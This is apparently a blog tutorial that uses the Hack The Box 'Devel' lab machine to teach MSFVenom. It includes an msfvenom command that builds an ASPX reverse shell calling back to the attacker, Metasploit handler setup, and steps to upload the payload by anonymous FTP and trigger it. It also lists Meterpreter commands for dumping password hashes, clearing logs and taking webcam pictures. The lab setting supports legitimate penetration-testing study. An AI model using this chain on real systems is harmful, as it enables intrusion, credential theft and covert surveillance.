I just recently successfully gained root (or rather, Administrator, because it’s a Windows box) on the Devel machine in Hack The Box.
The machine itself is very easy, and there are lots of writeups on it, I’m sure, so this won’t be another one. However, one thing it made really clear and simple was learning MSFVenom and getting to use reverse shells in a realistic scenario. Therefore, I’ll use the machine as an example to illustrate the usage of MSFVenom.
In this case, the machine is running IIS, with an FTP server that allows anonymous uploads, and an HTTP server running on the traditional port 80.
This is where MSFVenom comes in handy: We can upload arbitrary files and trigger their execution.
Some information:
- The victim’s IP is
10.10.10.5
- Our IP is
x.y.z.w
- We have no firewalls blocking inbound connections (this is a requirement if you want to have reverse shells connect back to you)
The reverse shell
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.y.z.w LPORT=1337 -f aspx > devel.aspx
This:
- Sets the payload to be a reverse TCP meterpreter shell (for Metasploit), for Windows machines. You can query the full list of payloads by running
$ msfvenom -l payloads
- Sets our IP to be
x.y.z.w
(the victim machine must be able to reach us on that IP) - Sets our listening port to be
1337
(remember this, you’ll need it to configure the listening end of the reverse shell: Metasploit) - Sets the format to be ASPX, C#
- Creates a file called
devel.aspx
in the current directory
Configure Metasploit
Now we have to configure Metasploit to listen to remote connections, using the same parametres given to MSFVenom.
(The following commands are to be executed sequentially in a Metasploit Console)
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.y.z.w
set lport 1337
set ExitOnSession false
exploit -j
Metasploit is now ready to accept connections to port 1337
and the specified IP address (in this case x.y.z.w
)
Triggering the reverse shell
In this case, now that we have the devel.aspx
file, we have to upload it via FTP. Because the FTP is pointing to the same directory as the HTTP server, we can just drop it there, and then navigate to http://10.10.10.5/devel.aspx
. A blank page will appear, but if we did everything correctly, a new line will appear in the listening console. It will say something similar to: Meterpreter session 1 opened (x.y.z.w:1337 -> 10.10.10.5:49160)
.
At this point, we can list sessions by issuing sessions -l
at the Metasploit console, and attach to the newly opened session by running sessions <SESSION ID>
, in this case, the session ID is 1, so sessions 1
attaches correctly to the shell.
Meterpreter
Now we’re in a Meterpreter Windows session, we can issue the following commands (note that to specify the folder separator in Meterpreter, you must use double slashes //
and not the standard Windows backslash \
):
ls
ordir
: lists the files and directoriescd
: changes directory, behaves just like Linux systemspwd
: shows the full path for the current directory, similar to Linux as wellbackground
: sends the Meterpreter session to the background, and resumes your Metasploit session, you can always return by reattaching the session withsessions <SESSION ID>
cat
: prints text files to the screen, like the Linux command of the same namedownload
orupload
: respectively download or upload files from/to the machinegetuid
: returns the user the reverse shell is running with, useful to let us know if we gained Administrator accessclearev
: clears the Application, System and Security logs for the machineexecute
: runs an arbitrary command given as the argumenthashdump
: dumps the contents of the SAM databaseidletime
: displays how much time has passed since the user was activeipconfig
: retrieves the network interface configurationps
: like the Linux tool of the same name, displays a list of running processes in the victim machineshell
: invokes a standard shellwebcam_list
: displays currently connected and configured web cams on the victim machinewebcam_snap
: takes a picture from a connected camera, and saves it to the current working directory with a random filename